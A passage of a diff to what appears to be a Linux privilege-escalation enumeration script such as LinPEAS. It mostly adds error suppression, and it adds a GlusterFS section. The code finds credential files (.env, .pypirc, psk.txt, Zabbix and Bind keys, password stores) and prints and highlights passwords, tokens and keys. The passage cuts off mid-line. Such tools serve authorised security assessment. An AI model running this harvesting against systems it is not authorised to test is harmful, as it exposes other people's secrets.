"s,passwd,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin.conf"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; fi @@ -3242,165 +3941,173 @@ fi if [ "$PSTORAGE_SNMP" ] || [ "$DEBUG" ]; then print_2title "Analyzing SNMP Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "snmpd.conf"; fi; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "snmpd.conf"; fi; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_PYPIRC" ] || [ "$DEBUG" ]; then print_2title "Analyzing Pypirc Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".pypirc"; fi; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".pypirc"; fi; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_POSTFIX" ] || [ "$DEBUG" ]; then print_2title "Analyzing Postfix Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postfix"; fi; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" | sed -${E} "s,postfix$,${SED_RED},"; find "$f" -name "master.cf" | while read ff; do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postfix"; fi; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,postfix$,${SED_RED},"; find "$f" -name "master.cf" | while read ff; do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_LDAPRC" ] || [ "$DEBUG" ]; then print_2title "Analyzing Ldaprc Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".ldaprc"; fi; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".ldaprc"; fi; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_ENV" ] || [ "$DEBUG" ]; then print_2title "Analyzing Env Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".env"; fi; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB],${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".env"; fi; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB],${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_MSMTPRC" ] || [ "$DEBUG" ]; then print_2title "Analyzing Msmtprc Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".msmtprc"; fi; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".msmtprc"; fi; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_KEEPASS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Keepass Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.kdbx"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.config*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.ini"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.enforced*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.kdbx"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.config*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.ini"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "KeePass.enforced*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_FTP" ] || [ "$DEBUG" ]; then print_2title "Analyzing FTP Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ftpconfig"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ffftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.config"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.ftpconfig"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ffftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ftp.config"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_ROCKETCHAT" ] || [ "$DEBUG" ]; then print_2title "Analyzing Rocketchat Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ROCKETCHAT\" | grep -E \"rocketchat\.service$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rocketchat.service"; fi; fi; printf "%s" "$PSTORAGE_ROCKETCHAT" | grep -E "rocketchat\.service$" | while read f; do ls -ld "$f" | sed -${E} "s,rocketchat\.service$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E -i "Environment" | sed -${E} "s,mongodb://.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ROCKETCHAT\" | grep -E \"rocketchat\.service$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rocketchat.service"; fi; fi; printf "%s" "$PSTORAGE_ROCKETCHAT" | grep -E "rocketchat\.service$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rocketchat\.service$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E -i "Environment" | sed -${E} "s,mongodb://.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_GLUSTERFS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing GlusterFS Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.pem$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.pem"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.pem$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,glusterfs\.pem$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.ca$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.ca"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.ca$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,glusterfs\.ca$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.key"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,glusterfs\.key$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_RACOON" ] || [ "$DEBUG" ]; then print_2title "Analyzing Racoon Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "racoon.conf"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "psk.txt"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "racoon.conf"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "psk.txt"; fi; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_OPERA" ] || [ "$DEBUG" ]; then print_2title "Analyzing Opera Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E \"com\.operasoftware\.Opera$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "com.operasoftware.Opera"; fi; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E "com\.operasoftware\.Opera$" | while read f; do ls -ld "$f" | sed -${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E \"com\.operasoftware\.Opera$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "com.operasoftware.Opera"; fi; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E "com\.operasoftware\.Opera$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; fi if [ "$PSTORAGE_SAFARI" ] || [ "$DEBUG" ]; then print_2title "Analyzing Safari Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SAFARI\" | grep -E \"Safari$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Safari"; fi; fi; printf "%s" "$PSTORAGE_SAFARI" | grep -E "Safari$" | while read f; do ls -ld "$f" | sed -${E} "s,Safari$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SAFARI\" | grep -E \"Safari$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Safari"; fi; fi; printf "%s" "$PSTORAGE_SAFARI" | grep -E "Safari$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Safari$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; fi if [ "$PSTORAGE_INFLUXDB" ] || [ "$DEBUG" ]; then print_2title "Analyzing InfluxDB Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_INFLUXDB\" | grep -E \"influxdb\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "influxdb.conf"; fi; fi; printf "%s" "$PSTORAGE_INFLUXDB" | grep -E "influxdb\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,influxdb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,auth-enabled.*=.*false|token|https-private-key,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_INFLUXDB\" | grep -E \"influxdb\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "influxdb.conf"; fi; fi; printf "%s" "$PSTORAGE_INFLUXDB" | grep -E "influxdb\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,influxdb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,auth-enabled.*=.*false|token|https-private-key,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_ZABBIX" ] || [ "$DEBUG" ]; then print_2title "Analyzing Zabbix Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_server\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_server.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_server\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix_server\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,DBName|DBUser|DBPassword,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_agentd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_agentd.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_agentd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix_agentd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,TLSPSKFile|psk,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix$,${SED_RED},"; find "$f" -name "*.psk" | while read ff; do ls -ld "$ff" | sed -${E} "s,.psk,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_server\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_server.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_server\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,zabbix_server\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,DBName|DBUser|DBPassword,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_agentd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_agentd.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_agentd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,zabbix_agentd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,TLSPSKFile|psk,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,zabbix$,${SED_RED},"; find "$f" -name "*.psk" | while read ff; do ls -ld "$ff" | sed -${E} "s,.psk,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_PRE_SHARED_KEYS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Pre-Shared Keys Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_PRE_SHARED_KEYS\" | grep -E \"\.psk$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.psk"; fi; fi; printf "%s" "$PSTORAGE_PRE_SHARED_KEYS" | grep -E "\.psk$" | while read f; do ls -ld "$f" | sed -${E} "s,\.psk$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PRE_SHARED_KEYS\" | grep -E \"\.psk$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.psk"; fi; fi; printf "%s" "$PSTORAGE_PRE_SHARED_KEYS" | grep -E "\.psk$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.psk$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_PASS_STORE_DIRECTORIES" ] || [ "$DEBUG" ]; then print_2title "Analyzing Pass Store Directories Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_PASS_STORE_DIRECTORIES\" | grep -E \"\.password-store$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".password-store"; fi; fi; printf "%s" "$PSTORAGE_PASS_STORE_DIRECTORIES" | grep -E "\.password-store$" | while read f; do ls -ld "$f" | sed -${E} "s,\.password-store$,${SED_RED},"; ls -lRA "$f";done; echo ""; + if ! [ "`echo \"$PSTORAGE_PASS_STORE_DIRECTORIES\" | grep -E \"\.password-store$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".password-store"; fi; fi; printf "%s" "$PSTORAGE_PASS_STORE_DIRECTORIES" | grep -E "\.password-store$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.password-store$,${SED_RED},"; ls -lRA "$f";done; echo ""; fi if [ "$PSTORAGE_BIND" ] || [ "$DEBUG" ]; then print_2title "Analyzing Bind Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bind"; fi; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" | sed -${E} "s,bind$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bind"; fi; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" 2>/dev/null | 